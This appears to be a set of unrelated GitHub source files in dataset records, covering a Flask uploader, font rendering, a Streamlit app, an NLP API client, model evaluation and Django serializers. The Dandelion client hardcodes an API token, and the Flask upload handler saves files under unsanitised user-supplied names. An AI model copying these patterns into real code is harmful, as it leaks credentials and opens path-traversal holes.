Blueprint('loader_blueprint', __name__, template_folder='templates', static_folder='static')\n\n\n# Страница с формой для добавления нового поста\n@loader_blueprint.route(\"/post_form/\", methods=[\"POST\", \"GET\"])\ndef page_post_form():\n\n return render_template('post_form.html')\n\n\n\n@loader_blueprint.route(\"/post_uploaded/\", methods=[\"POST\", \"GET\"])\ndef page_post_uploaded():\n try:\n post_content = request.form['content'] # Получаем текст из формы\n picture = request.files.get('picture') # Получаем изображение\n filename = picture.filename # Получаем имя файла(изображения)\n picture_path = f\"{UPLOAD_FOLDER}/{filename}\" # формируем путь для сохранения изображения\n picture.save(picture_path) # Сохраняем изображение\n get_new_post(POST_PATH, picture_path, post_content, load_json_data(POST_PATH)) # Формируем новый пост\n logger.info('Загружен новый пост')\n return render_template('post_uploaded.html', post_content=post_content, picture_path=picture_path)\n except:\n logger.error('Ошибка загрузки данных поста')\n return render_template('error.html')\n\n","repo_name":"Kosheyking/homework12","sub_path":"loader/loader.py","file_name":"loader.py","file_ext":"py","file_size_in_byte":1571,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"7142624767","text":"import pygame\nfrom globalValues import *\n\n\nclass Wall(pygame.sprite.Sprite):\n def __init__(self, width, height, posX, posY, color):\n pygame.sprite.Sprite.__init__(self)\n self.image = pygame.Surface([width, height])\n self.image.fill(color)\n self.rect = self.image.get_rect()\n self.rect.center = [posX, posY]\n","repo_name":"Aleksiiej/pacman_linux","sub_path":"map/wall.py","file_name":"wall.py","file_ext":"py","file_size_in_byte":345,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"9679706338","text":"from multiprocessing import Pool\nimport subprocess\nimport argparse\nimport shlex\nimport sys\n\nclass Engine(object):\n \n # 并发数量\n def __init__(self, cmds, pnum = 5):\n self.cmds = cmds\n self.pnum = pnum\n\n def task(self, cmd):\n p = subprocess.Popen(shlex.split(cmd),close_fds=True, bufsize=-1)\n p.communicate()\n\n def start(self):\n pool = Pool(self.pnum)\n for cmd in self.cmds:\n pool.apply_async(self.task, (cmd,))\n pool.close()\n pool.join()\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument('-c',\"--cmds\", help='输入执行的命令')\n parser.add_argument('-p',\"--process\", type=int, help=\"进程数量\", default=5)\n args = parser.parse_args()\n cmds = args.cmds.split(\"\\n\")\n pnum = args.process\n engine = Engine(cmds, pnum)\n engine.start()\n ","repo_name":"linpengstc/pentest","sub_path":"core/engine.py","file_name":"engine.py","file_ext":"py","file_size_in_byte":887,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"28265954506","text":"from PIL import Image, ImageDraw, ImageFont\nimport numpy as np\n# get an image\n\n# make a blank image for the text, initialized to transparent text color\nfrom PIL import FontFile\n\n# --------------------------------------------------------------------\n# parse X Bitmap Distribution Format (BDF)\n# --------------------------------------------------------------------\n\nbdf_slant = {\n \"R\": \"Roman\",\n \"I\": \"Italic\",\n \"O\": \"Oblique\",\n \"RI\": \"Reverse Italic\",\n \"RO\": \"Reverse Oblique\",\n \"OT\": \"Other\",\n}\n\nbdf_spacing = {\"P\": \"Proportional\", 
\"M\": \"Monospaced\", \"C\": \"Cell\"}\n\n\ndef bdf_char(f):\n # skip to STARTCHAR\n while True:\n s = f.readline()\n if not s:\n return None\n if s[:9] == b\"STARTCHAR\":\n break\n id = s[9:].strip().decode(\"ascii\")\n\n # load symbol properties\n props = {}\n while True:\n s = f.readline()\n if not s or s[:6] == b\"BITMAP\":\n break\n i = s.find(b\" \")\n props[s[:i].decode(\"ascii\")] = s[i + 1 : -1].decode(\"ascii\")\n\n # load bitmap\n bitmap = []\n while True:\n s = f.readline()\n if not s or s[:7] == b\"ENDCHAR\":\n break\n bitmap.append(s[:-1])\n bitmap = b\"\".join(bitmap)\n\n [x, y, l, d] = [int(p) for p in props[\"BBX\"].split()]\n [dx, dy] = [int(p) for p in props[\"DWIDTH\"].split()]\n\n bbox = (dx, dy), (l, -d - y, x + l, -d), (0, 0, x, y)\n\n try:\n im = Image.frombytes(\"1\", (x, y), bitmap, \"hex\", \"1\")\n except ValueError:\n # deal with zero-width characters\n im = Image.new(\"1\", (x, y))\n\n return id, int(props[\"ENCODING\"]), bbox, im\n\n\n##\n# Font file plugin for the X11 BDF format.\n\nIMG_EPS = 1e-6\n\ndef normalize_0_1(img:np.ndarray):\n assert img.ndim == 2\n m = img.max()\n if m < IMG_EPS:\n return np.ones_like(img, dtype = np.float) * IMG_EPS\n return img / m\n\nclass BdfFontFile(FontFile.FontFile):\n def __init__(self, fp):\n\n FontFile.FontFile.__init__(self)\n\n s = fp.readline()\n if s[:13] != b\"STARTFONT 2.1\":\n raise SyntaxError(\"not a valid BDF file\")\n\n props = {}\n comments = []\n\n while True:\n s = fp.readline()\n if not s or s[:13] == b\"ENDPROPERTIES\":\n break\n i = s.find(b\" \")\n props[s[:i].decode(\"ascii\")] = s[i + 1 : -1].decode(\"ascii\")\n if s[:i] in [b\"COMMENT\", b\"COPYRIGHT\"]:\n if s.find(b\"LogicalFontDescription\") < 0:\n comments.append(s[i + 1 : -1].decode(\"ascii\"))\n\n while True:\n c = bdf_char(fp)\n if not c:\n break\n id, ch, (xy, dst, src), im = c\n if 0 <= ch < len(self.glyph):\n self.glyph[ch] = id, xy, dst, src, im\n\n\nclass FontBase:\n\n # while character\n def genChar(self, c:str):\n raise Exception(\"should be implemented as return np.array, PIL.Image\")\n\n def genAllChar(self):\n self.chnp = []\n self.chimg = []\n for i in self.decoding_table:\n a, b = self.genChar(i)\n self.chnp += [a]\n self.chimg += [b]\n\n def drawOut(self,data:np.ndarray, img0 = None):\n \"\"\"\n\n :param data: (H,W, 7 ) ascii, fore rgb, back rgb\n :param img0: (H*hh, W*ww, 3 ) original image before parse, if this is set return diff value\n :return: (H*hh, W*ww, 3 ), diff value (H, W)\n \"\"\"\n H,W,_ = data.shape\n h = H * self.h\n w = W * self.w\n d2 = np.zeros( (h, w, 3) )\n diffImg = np.zeros( shape = (H,W) )\n for hi in range(H):\n for wi in range(W):\n ascii_idx,r1,g1,b1,r2,g2,b2 = data[hi,wi].tolist()\n fcolor = np.array([r1,g1,b1]).reshape((1,1,3))\n bcolor = np.array([r2,g2,b2]).reshape((1,1,3))\n stencil = self.chnp[ascii_idx].reshape( (self.h, self.w, 1) )\n stencil = np.repeat(stencil,3,axis=2)\n stencil_neg = 1.0 - stencil\n result = stencil * fcolor\n result += stencil_neg * bcolor\n d2[ hi * self.h: (hi+1) * self.h, wi * self.w : (wi+1) * self.w ] = result\n\n if img0 is not None:\n diff = result - img0[ hi * self.h: (hi+1) * self.h, wi * self.w : (wi+1) * self.w ]\n diff = np.abs(diff)\n diff = float(np.sum(diff))\n diffImg[hi,wi] = diff\n if img0 is not None:\n return d2, diffImg\n return d2\n\n def static_table(self):\n self.decoding_table = 
[u\"\\u0000\",\nu\"\\u263A\",\nu\"\\u263B\",\nu\"\\u2665\",\nu\"\\u2666\",\nu\"\\u2663\",\nu\"\\u2660\",\nu\"\\u2022\",\nu\"\\u25D8\",\nu\"\\u25CB\",\nu\"\\u25D9\",\nu\"\\u2642\",\nu\"\\u2640\",\nu\"\\u266A\",\nu\"\\u266B\",\nu\"\\u263C\",\nu\"\\u25BA\",\nu\"\\u25C4\",\nu\"\\u2195\",\nu\"\\u203C\",\nu\"\\u00B6\",\nu\"\\u00A7\",\nu\"\\u25AC\",\nu\"\\u21A8\",\nu\"\\u2191\",\nu\"\\u2193\",\nu\"\\u2192\",\nu\"\\u2190\",\nu\"\\u221F\",\nu\"\\u2194\",\nu\"\\u25B2\",\nu\"\\u25BC\",\nu\"\\u0020\",\nu\"\\u0021\",\nu\"\\u0022\",\nu\"\\u0023\",\nu\"\\u0024\",\nu\"\\u0025\",\nu\"\\u0026\",\nu\"\\u0027\",\nu\"\\u0028\",\nu\"\\u0029\",\nu\"\\u002A\",\nu\"\\u002B\",\nu\"\\u002C\",\nu\"\\u002D\",\nu\"\\u002E\",\nu\"\\u002F\",\nu\"\\u0030\",\nu\"\\u0031\",\nu\"\\u0032\",\nu\"\\u0033\",\nu\"\\u0034\",\nu\"\\u0035\",\nu\"\\u0036\",\nu\"\\u0037\",\nu\"\\u0038\",\nu\"\\u0039\",\nu\"\\u003A\",\nu\"\\u003B\",\nu\"\\u003C\",\nu\"\\u003D\",\nu\"\\u003E\",\nu\"\\u003F\",\nu\"\\u0040\",\nu\"\\u0041\",\nu\"\\u0042\",\nu\"\\u0043\",\nu\"\\u0044\",\nu\"\\u0045\",\nu\"\\u0046\",\nu\"\\u0047\",\nu\"\\u0048\",\nu\"\\u0049\",\nu\"\\u004A\",\nu\"\\u004B\",\nu\"\\u004C\",\nu\"\\u004D\",\nu\"\\u004E\",\nu\"\\u004F\",\nu\"\\u0050\",\nu\"\\u0051\",\nu\"\\u0052\",\nu\"\\u0053\",\nu\"\\u0054\",\nu\"\\u0055\",\nu\"\\u0056\",\nu\"\\u0057\",\nu\"\\u0058\",\nu\"\\u0059\",\nu\"\\u005A\",\nu\"\\u005B\",\nu\"\\u005C\",\nu\"\\u005D\",\nu\"\\u005E\",\nu\"\\u005F\",\nu\"\\u0060\",\nu\"\\u0061\",\nu\"\\u0062\",\nu\"\\u0063\",\nu\"\\u0064\",\nu\"\\u0065\",\nu\"\\u0066\",\nu\"\\u0067\",\nu\"\\u0068\",\nu\"\\u0069\",\nu\"\\u006A\",\nu\"\\u006B\",\nu\"\\u006C\",\nu\"\\u006D\",\nu\"\\u006E\",\nu\"\\u006F\",\nu\"\\u0070\",\nu\"\\u0071\",\nu\"\\u0072\",\nu\"\\u0073\",\nu\"\\u0074\",\nu\"\\u0075\",\nu\"\\u0076\",\nu\"\\u0077\",\nu\"\\u0078\",\nu\"\\u0079\",\nu\"\\u007A\",\nu\"\\u007B\",\nu\"\\u007C\",\nu\"\\u007D\",\nu\"\\u007E\",\nu\"\\u2302\",\nu\"\\u00C7\",\nu\"\\u00FC\",\nu\"\\u00E9\",\nu\"\\u00E2\",\nu\"\\u00E4\",\nu\"\\u00E0\",\nu\"\\u00E5\",\nu\"\\u00E7\",\nu\"\\u00EA\",\nu\"\\u00EB\",\nu\"\\u00E8\",\nu\"\\u00EF\",\nu\"\\u00EE\",\nu\"\\u00EC\",\nu\"\\u00C4\",\nu\"\\u00C5\",\nu\"\\u00C9\",\nu\"\\u00E6\",\nu\"\\u00C6\",\nu\"\\u00F4\",\nu\"\\u00F6\",\nu\"\\u00F2\",\nu\"\\u00FB\",\nu\"\\u00F9\",\nu\"\\u00FF\",\nu\"\\u00D6\",\nu\"\\u00DC\",\nu\"\\u00A2\",\nu\"\\u00A3\",\nu\"\\u00A5\",\nu\"\\u20A7\",\nu\"\\u0192\",\nu\"\\u00E1\",\nu\"\\u00ED\",\nu\"\\u00F3\",\nu\"\\u00FA\",\nu\"\\u00F1\",\nu\"\\u00D1\",\nu\"\\u00AA\",\nu\"\\u00BA\",\nu\"\\u00BF\",\nu\"\\u2310\",\nu\"\\u00AC\",\nu\"\\u00BD\",\nu\"\\u00BC\",\nu\"\\u00A1\",\nu\"\\u00AB\",\nu\"\\u00BB\",\nu\"\\u2591\",\nu\"\\u2592\",\nu\"\\u2593\",\nu\"\\u2502\",\nu\"\\u2524\",\nu\"\\u2561\",\nu\"\\u2562\",\nu\"\\u2556\",\nu\"\\u2555\",\nu\"\\u2563\",\nu\"\\u2551\",\nu\"\\u2557\",\nu\"\\u255D\",\nu\"\\u255C\",\nu\"\\u255B\",\nu\"\\u2510\",\nu\"\\u2514\",\nu\"\\u2534\",\nu\"\\u252C\",\nu\"\\u251C\",\nu\"\\u2500\",\nu\"\\u253C\",\nu\"\\u255E\",\nu\"\\u255F\",\nu\"\\u255A\",\nu\"\\u2554\",\nu\"\\u2569\",\nu\"\\u2566\",\nu\"\\u2560\",\nu\"\\u2550\",\nu\"\\u256C\",\nu\"\\u2567\",\nu\"\\u2568\",\nu\"\\u2564\",\nu\"\\u2565\",\nu\"\\u2559\",\nu\"\\u2558\",\nu\"\\u2552\",\nu\"\\u2553\",\nu\"\\u256B\",\nu\"\\u256A\",\nu\"\\u2518\",\nu\"\\u250C\",\nu\"\\u2588\",\nu\"\\u2584\",\nu\"\\u258C\",\nu\"\\u2590\",\nu\"\\u2580\",\nu\"\\u03B1\",\nu\"\\u00DF\",\nu\"\\u0393\",\nu\"\\u03C0\",\nu\"\\u03A3\",\nu\"\\u03C3\",\nu\"\\u00B5\",\nu\"\\u03C4\",\nu\"\\u03A6\",\nu\"\\u0398\",\nu\"\\u03A9\",\nu\"\\u03B4\",\nu\"\\u221E\",\
nu\"\\u03C6\",\nu\"\\u03B5\",\nu\"\\u2229\",\nu\"\\u2261\",\nu\"\\u00B1\",\nu\"\\u2265\",\nu\"\\u2264\",\nu\"\\u2320\",\nu\"\\u2321\",\nu\"\\u00F7\",\nu\"\\u2248\",\nu\"\\u00B0\",\nu\"\\u2219\",\nu\"\\u00B7\",\nu\"\\u221A\",\nu\"\\u207F\",\nu\"\\u00B2\",\nu\"\\u25A0\",\nu\"\\u00A0\"]\n self.decoding_table_rmap = { k:v for v,k in enumerate(self.decoding_table) }\n\n def findC(self, ascii_c:int, color = [255,255,255], bcolor = [0,0,0]): # notice default arg mutable\n raise Exception(\"should be implemented as return np.array of (h,w,c)\")\n\nclass TTFFont(FontBase):\n def __init__(self, font_size):\n self.font_size = font_size\n self.scale = 2\n self.h = font_size\n self.w = font_size // 2\n ttf_font = 'terminus-ttf-4.47.0/TerminusTTF-4.47.0.ttf'\n bdf_font = \"terminus-font-4.48/ter-u12n.bdf\"\n #self.fnt = ImageFont.truetype(ttf_font, font_size * self.scale)\n self.fnt = ImageFont.truetype(\"courbd.ttf\", font_size * self.scale)\n\n self.static_table()\n self.genAllChar()\n\n\n\n # while character\n def genChar(self, c):\n # 'L' mode grey color\n txt = Image.new('L', (self.font_size*self.scale // 2, self.font_size*self.scale), 0)\n d = ImageDraw.Draw(txt)\n d.text((0,0), c, font=self.fnt, fill=255)\n txt = txt.resize( (self.font_size // 2, self.font_size ),Image.NEAREST )\n #txt.save(f\"x_{self.decoding_table_rmap[c]}.bmp\")\n return normalize_0_1(np.array(txt, dtype=np.float)), txt\n\nclass BitmapFont(FontBase):\n def __init__(self, font_size):\n self.font_size = font_size\n if font_size == 12:\n bdf_font = \"terminus-font-4.48/ter-u12n.bdf\"\n elif font_size == 18:\n bdf_font = \"terminus-font-4.48/ter-u18n.bdf\"\n else:\n raise Exception(f\"do not support front size {font_size}\")\n\n self.h = font_size\n self.w = font_size // 2 # NOTICE fixed\n self.empty_set = set()\n\n with open(bdf_font,'rb') as f:\n self.fnt = BdfFontFile(f)\n\n self.static_table()\n self.genAllChar()\n\n # while character\n def genChar(self, c):\n ascii_idx = self.decoding_table_rmap[c]\n if self.fnt.glyph[ascii_idx] is None:\n self.empty_set.add(ascii_idx)\n return self.genChar(' ')\n id,_,_,_,im = self.fnt.glyph[ascii_idx]\n return normalize_0_1(1*np.array(im, dtype=np.float)), im\n\nclass CombinedBitmapFont(BitmapFont):\n def __init__(self, font_size):\n self._f = TTFFont(font_size)\n\n self.chBelong = [-1] * 256\n super().__init__(font_size)\n print(\"done\")\n\n # while character\n def genChar(self, c):\n idx = self.decoding_table_rmap[c]\n ascii_idx = self.decoding_table_rmap[c]\n if self.fnt.glyph[ascii_idx] is None:\n self.empty_set.add(ascii_idx)\n self.chBelong[ ascii_idx ] = 0\n return self._f.genChar(c)\n id,_,_,_,im = self.fnt.glyph[ascii_idx]\n if idx >= 128:\n self.chBelong[ascii_idx] = 0\n return self._f.genChar(c)\n self.chBelong[ascii_idx] = 1\n #im.save(f\"x_{self.decoding_table_rmap[c]}.bmp\")\n t = normalize_0_1(1*np.array(im, dtype=np.float))\n if self.font_size == 18:\n # it is 18 x 10 size, remove the last column\n t = t[:,:-1]\n return t, im\n\n\n\n\nclass PictureFont(FontBase):\n \"\"\"\n Load \"font\" from a image\n \"\"\"\n def __init__(self, font_size = 12):\n if font_size == 12:\n self.path = \"cp437_12x12.png\"\n if font_size == 18:\n self.path = \"cp437_18x18.png\"\n self.fullimg = Image.open(self.path)\n fw, fh = self.fullimg.size\n # assume 16 x 16 blocks\n self.w = fw // 16\n self.h = fh // 16\n assert self.h == self.w\n self.font_size = self.h\n self.static_table()\n self.convertImage()\n self.patch()\n\n def convertImage(self):\n imgArr = np.array(self.fullimg)\n # (h1, h2, w1, 
w2, c)\n imgArr = imgArr.reshape( (16, self.h, 16, self.w, 3) )\n self.chnp = []\n self.chimg = []\n for i in range(16):\n for j in range(16):\n smallarr = imgArr[ i,:,j,:,:]\n smallImg = Image.fromarray(smallarr)\n smallarr2 = smallarr.sum(axis = -1)\n smallarr2 = normalize_0_1(smallarr2)\n self.chnp += [ smallarr2 ]\n self.chimg += [smallImg]\n #smallImg.save(f\"x_{i*16 + j}.bmp\")\n\n def genAllChar(self):\n pass\n\n # while character\n def genChar(self, c):\n idx = self.decoding_table_rmap[c]\n return self.chnp[idx], self.chimg[idx]\n\n def patch(self):\n sharp12 = np.array([[0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0.,],\n [0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0.,],\n [0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0.,],\n [0., 0., 0., 0., 1., 0., 0., 1., 0., 0., 0., 0.,],\n [0., 0., 0., 1., 1., 1., 1., 1., 1., 0., 0., 0.,],\n [0., 0., 0., 0., 1., 0., 0., 1., 0., 0., 0., 0.,],\n [0., 0., 0., 0., 1., 0., 0., 1., 0., 0., 0., 0.,],\n [0., 0., 0., 1., 1., 1., 1., 1., 1., 0., 0., 0.,],\n [0., 0., 0., 0., 1., 0., 0., 1., 0., 0., 0., 0.,],\n [0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0.,],\n [0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0.,],\n [0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0.,]] )\n idx = self.decoding_table_rmap['#']\n if self.path == \"cp437_12x12.png\":\n self.chnp[idx] = sharp12\n # TODO change self.chimg as well","repo_name":"oneengineer/cogai","sub_path":"fonts.py","file_name":"fonts.py","file_ext":"py","file_size_in_byte":12802,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"15975503385","text":"#!/usr/bin/python3\n\n\ndef print_matrix_integer(matrix=[[]]):\n\n for row in matrix:\n j = 0\n for column in row:\n lon = len(row)\n j += 1\n print(\"{:d}\".format(column), end=\"\")\n if j != lon:\n print(\" \", end=\"\")\n print(\"\")\n","repo_name":"Caroll1889/holbertonschool-higher_level_programming","sub_path":"0x03-python-data_structures/6-print_matrix_integer.py","file_name":"6-print_matrix_integer.py","file_ext":"py","file_size_in_byte":298,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"34183892717","text":"import urllib2\n\nfrom localsettings import TEST_URL\n\nresponse = urllib2.urlopen(TEST_URL)\ndata = response.read()\n\n# Write data to file\nfilename = 'data.csv'\nfile_ = open(filename, 'w')\nfile_.write(data)\nfile_.close()\n","repo_name":"mgeraci/trackmytour-rss","sub_path":"download-data.py","file_name":"download-data.py","file_ext":"py","file_size_in_byte":216,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"41013557925","text":"import streamlit as st\nimport pandas as pd\nfrom src.cargar_datos import *\nfrom src.streamlit import *\nfrom data import *\nfrom streamlit_folium import folium_static\n\nst.write('''\n# Skiing:\n# Escoge tu estacion:\n''')\ndata = cargardatos()\nrestdata = cargarrestaurantes()\nestaciones = data['estacion']\n#map = pd.read_json('data/kepler.gl.json')\n\ninput_nivel = ['elige','novato','principiante', 'medio', 'experto']\nnivel = st.selectbox('Cual es tu nivel de skii: ', input_nivel)\nif nivel == 'elige':\n st.stop()\n \ninput_snow = ['elige', 'S', 'N', 'indiferente']\nsnow = st.radio('¿Quieres que haya Snonwpark? 
', input_snow)\nif snow == 'elige':\n st.stop()\n\n\ninput_fam = ['elige', 'S', 'N']\nfam = st.radio('Vas con tu familia: ', input_fam)\nif fam == 'elige':\n st.stop()\n\n\nrespuesta = convinetor(nivel,snow,fam)\n#print(respuesta)\n#mapita(respuesta)\nfolium_static(mapita(respuesta))\nrespuesta\n#detalles = mostrar(respuesta)\n#detalles","repo_name":"Afidalgo-fmm/Sking-across-Spain","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":936,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"73451878026","text":"import requests\nimport json\n\nclass Dandelion:\n\n # in production, credential would be maintained within the \n # configuration and certainly not in the source code!\n # this is a free test account so not too worried about it :)\n TOKEN = \"2c0edee96e414d7e8fa468a38f688a2e\"\n URL = \"https://api.dandelion.eu/datatxt/nex/v1\"\n\n # these are pretty arbitrary, just played around a bit\n NUM_ENTITIES = 3\n MIN_CONFIDENCE = 0.7\n\n # dandelion API limits text length\n CHAR_LIMIT = 3000\n\n def getEntities(self, text):\n keywords = set()\n min_index = 0\n max_index = self.CHAR_LIMIT if len(text) > self.CHAR_LIMIT else len(text)\n while max_index <= len(text):\n short_text = text[min_index:max_index]\n params = {\n 'token': self.TOKEN,\n 'text': short_text,\n 'top_entities': self.NUM_ENTITIES,\n 'min_confidence': self.MIN_CONFIDENCE\n }\n response = requests.get(self.URL, params=params)\n for annotation in response.json()['topEntities']:\n keywords.add(annotation['uri'])\n\n min_index = max_index\n if (max_index == len(text)):\n break\n max_index = max_index + self.CHAR_LIMIT if max_index + self.CHAR_LIMIT <= len(text) else len(text)\n return keywords\n","repo_name":"loetting/regtest","sub_path":"RegulationNLP/Dandelion.py","file_name":"Dandelion.py","file_ext":"py","file_size_in_byte":1392,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"11212000106","text":"from collections import OrderedDict\nfrom datetime import datetime\nimport json\n\nimport joblib\nimport pandas as pd\nimport torch.utils.data\n\nfrom .. import models\nfrom .. import transforms\nfrom ..datasets.vocal_dataset import VocalDataset\nfrom ..logging import log_or_print\n\n\ndef eval(csv_path,\n model_config_map,\n checkpoint_path,\n labelmap_path,\n output_dir,\n window_size,\n num_workers,\n split='test',\n spect_scaler_path=None,\n spect_key='s',\n timebins_key='t',\n device=None,\n logger=None):\n \"\"\"evaluate a trained model\n\n Parameters\n ----------\n csv_path : str, pathlib.Path\n path to where dataset was saved as a csv.\n model_config_map : dict\n where each key-value pair is model name : dict of config parameters\n checkpoint_path : str, pathlib.Path\n path to directory with checkpoint files saved by Torch, to reload model\n output_dir : str, pathlib.Path\n Path to location where .csv files with evaluation metrics should be saved.\n window_size : int\n size of windows taken from spectrograms, in number of time bins,\n shown to neural networks\n labelmap_path : str, pathlib.Path\n path to 'labelmap.json' file.\n models : list\n of model names. e.g., 'models = TweetyNet, GRUNet, ConvNet'\n batch_size : int\n number of samples per batch presented to models during training.\n num_workers : int\n Number of processes to use for parallel loading of data.\n Argument to torch.DataLoader. 
Default is 2.\n split : str\n split of dataset on which model should be evaluated.\n One of {'train', 'val', 'test'}. Default is 'test'.\n spect_scaler_path : str, pathlib.Path\n path to a saved SpectScaler object used to normalize spectrograms.\n If spectrograms were normalized and this is not provided, will give\n incorrect results.\n Default is None.\n spect_key : str\n key for accessing spectrogram in files. Default is 's'.\n timebins_key : str\n key for accessing vector of time bins in files. Default is 't'.\n device : str\n Device on which to work with model + data.\n Defaults to 'cuda' if torch.cuda.is_available is True.\n\n Other Parameters\n ----------------\n logger : logging.Logger\n instance created by vak.logging.get_logger. Default is None.\n\n Returns\n -------\n None\n \"\"\"\n # ---- get time for .csv file --------------------------------------------------------------------------\n timenow = datetime.now().strftime('%y%m%d_%H%M%S')\n\n # ---------------- load data for evaluation ------------------------------------------------------------------------\n if spect_scaler_path:\n log_or_print(\n f'loading spect scaler from path: {spect_scaler_path}',\n logger=logger, level='info'\n )\n spect_standardizer = joblib.load(spect_scaler_path)\n else:\n log_or_print(\n f'not using a spect scaler',\n logger=logger, level='info',\n )\n spect_standardizer = None\n\n logger.info(\n f'loading labelmap from path: {spect_scaler_path}'\n )\n with labelmap_path.open('r') as f:\n labelmap = json.load(f)\n\n item_transform = transforms.get_defaults('eval',\n spect_standardizer,\n window_size=window_size,\n return_padding_mask=True,\n )\n log_or_print(\n f'creating dataset for evaluation from: {csv_path}',\n logger=logger, level='info',\n )\n val_dataset = VocalDataset.from_csv(csv_path=csv_path,\n split=split,\n labelmap=labelmap,\n spect_key=spect_key,\n timebins_key=timebins_key,\n item_transform=item_transform,\n )\n val_data = torch.utils.data.DataLoader(dataset=val_dataset,\n shuffle=False,\n # batch size 1 because each spectrogram reshaped into a batch of windows\n batch_size=1,\n num_workers=num_workers)\n\n # ---------------- do the actual evaluating ------------------------------------------------------------------------\n input_shape = val_dataset.shape\n # if dataset returns spectrogram reshaped into windows,\n # throw out the window dimension; just want to tell network (channels, height, width) shape\n if len(input_shape) == 4:\n input_shape = input_shape[1:]\n\n models_map = models.from_model_config_map(\n model_config_map,\n num_classes=len(labelmap),\n input_shape=input_shape\n )\n\n for model_name, model in models_map.items():\n logger.info(\n f'running evaluation for model: {model_name}'\n )\n model.load(checkpoint_path)\n metric_vals = model.evaluate(eval_data=val_data,\n device=device)\n # create a \"DataFrame\" with just one row which we will save as a csv;\n # the idea is to be able to concatenate csvs from multiple runs of eval\n row = OrderedDict(\n [\n ('model_name', model_name),\n ('checkpoint_path', checkpoint_path),\n ('labelmap_path', labelmap_path),\n ('spect_scaler_path', spect_scaler_path),\n ('csv_path', csv_path),\n ]\n )\n # order metrics by name to be extra sure they will be consistent across runs\n row.update(\n sorted([(k, v) for k, v in metric_vals.items() if k.startswith('avg_')])\n )\n\n # pass index into dataframe, needed when using all scalar values (a single row)\n # throw away index below when saving to avoid extra column\n eval_df = pd.DataFrame(row, 
index=[0])\n eval_csv_path = output_dir.joinpath(\n f'eval_{model_name}_{timenow}.csv'\n )\n logger.info(\n f'saving csv with evaluation metrics at: {eval_csv_path}'\n )\n eval_df.to_csv(eval_csv_path, index=False) # index is False to avoid having \"Unnamed: 0\" column when loading\n","repo_name":"Tubbz-alt/vak","sub_path":"src/vak/core/eval.py","file_name":"eval.py","file_ext":"py","file_size_in_byte":6505,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"81"} +{"seq_id":"29204387985","text":"from rest_framework import serializers\nfrom .models import Brand, Products, Category, Color, Gender, Size, Status, Subcategory, Update, Messages, UserAlem\nfrom .models import Orders, Favorites\n\n\nclass BrandSerializer(serializers.HyperlinkedModelSerializer):\n products = serializers.HyperlinkedRelatedField(\n many=True,\n read_only=True,\n view_name='product-detail')\n\n class Meta:\n model = Brand\n fields = ('url', 'name', 'products', )\n\n\nclass ProductSerializer(serializers.HyperlinkedModelSerializer):\n\n class Meta:\n model = Products\n fields = ('name', 'description', 'photo', 'brand', 'category', 'color', 'gender', 'size', 'status',\n 'subcategory', 'update',)\n\n\n\nclass CategorySerializer(serializers.HyperlinkedModelSerializer):\n products = serializers.HyperlinkedRelatedField(\n many=True,\n read_only=True,\n view_name='product-detail')\n\n class Meta:\n model = Category\n fields = ('url', 'pk', 'ai', 'name', 'products', 'photo')\n\nclass ColorSerializer(serializers.HyperlinkedModelSerializer):\n products = serializers.HyperlinkedRelatedField(\n many=True,\n read_only=True,\n view_name='product-detail')\n\n class Meta:\n model = Color\n fields = ('url', 'name', 'products', )\n\nclass GenderSerializer(serializers.HyperlinkedModelSerializer):\n products = serializers.HyperlinkedRelatedField(\n many=True,\n read_only=True,\n view_name='product-detail')\n\n class Meta:\n model = Gender\n fields = ('url', 'name', 'products', )\n\nclass SizeSerializer(serializers.HyperlinkedModelSerializer):\n products = serializers.HyperlinkedRelatedField(\n many=True,\n read_only=True,\n view_name='product-detail')\n\n class Meta:\n model = Size\n fields = ('url', 'name', 'subcategory','products', )\n\nclass StatusSerializer(serializers.HyperlinkedModelSerializer):\n products = serializers.HyperlinkedRelatedField(\n many=True,\n read_only=True,\n view_name='product-detail')\n\n class Meta:\n model = Status\n fields = ('url', 'name', 'products', )\n\nclass SubcategorySerializer(serializers.HyperlinkedModelSerializer):\n products = serializers.HyperlinkedRelatedField(\n many=True,\n read_only=True,\n view_name='product-detail')\n\n class Meta:\n model = Subcategory\n fields = ('url', 'name', 'category', 'products', )\n\nclass UpdateSerializer(serializers.HyperlinkedModelSerializer):\n products = serializers.HyperlinkedRelatedField(\n many=True,\n read_only=True,\n view_name='product-detail')\n\n class Meta:\n model = Update\n fields = ('url', 'update', 'products')\n\nclass MessageSerializer(serializers.ModelSerializer):\n user = serializers.SlugRelatedField(queryset=UserAlem.objects.all(), slug_field='username')\n #user = serializers.HyperlinkedRelatedField(\n #many=True,\n #read_only=True,\n #view_name='messages-detail')\n\n class Meta:\n model = Messages\n fields = ('url', 'user', 'text', 'date')\n\nclass OrdersSerializer(serializers.ModelSerializer):\n user = serializers.SlugRelatedField(queryset=UserAlem.objects.all(), slug_field='username')\n\n class Meta:\n model = 
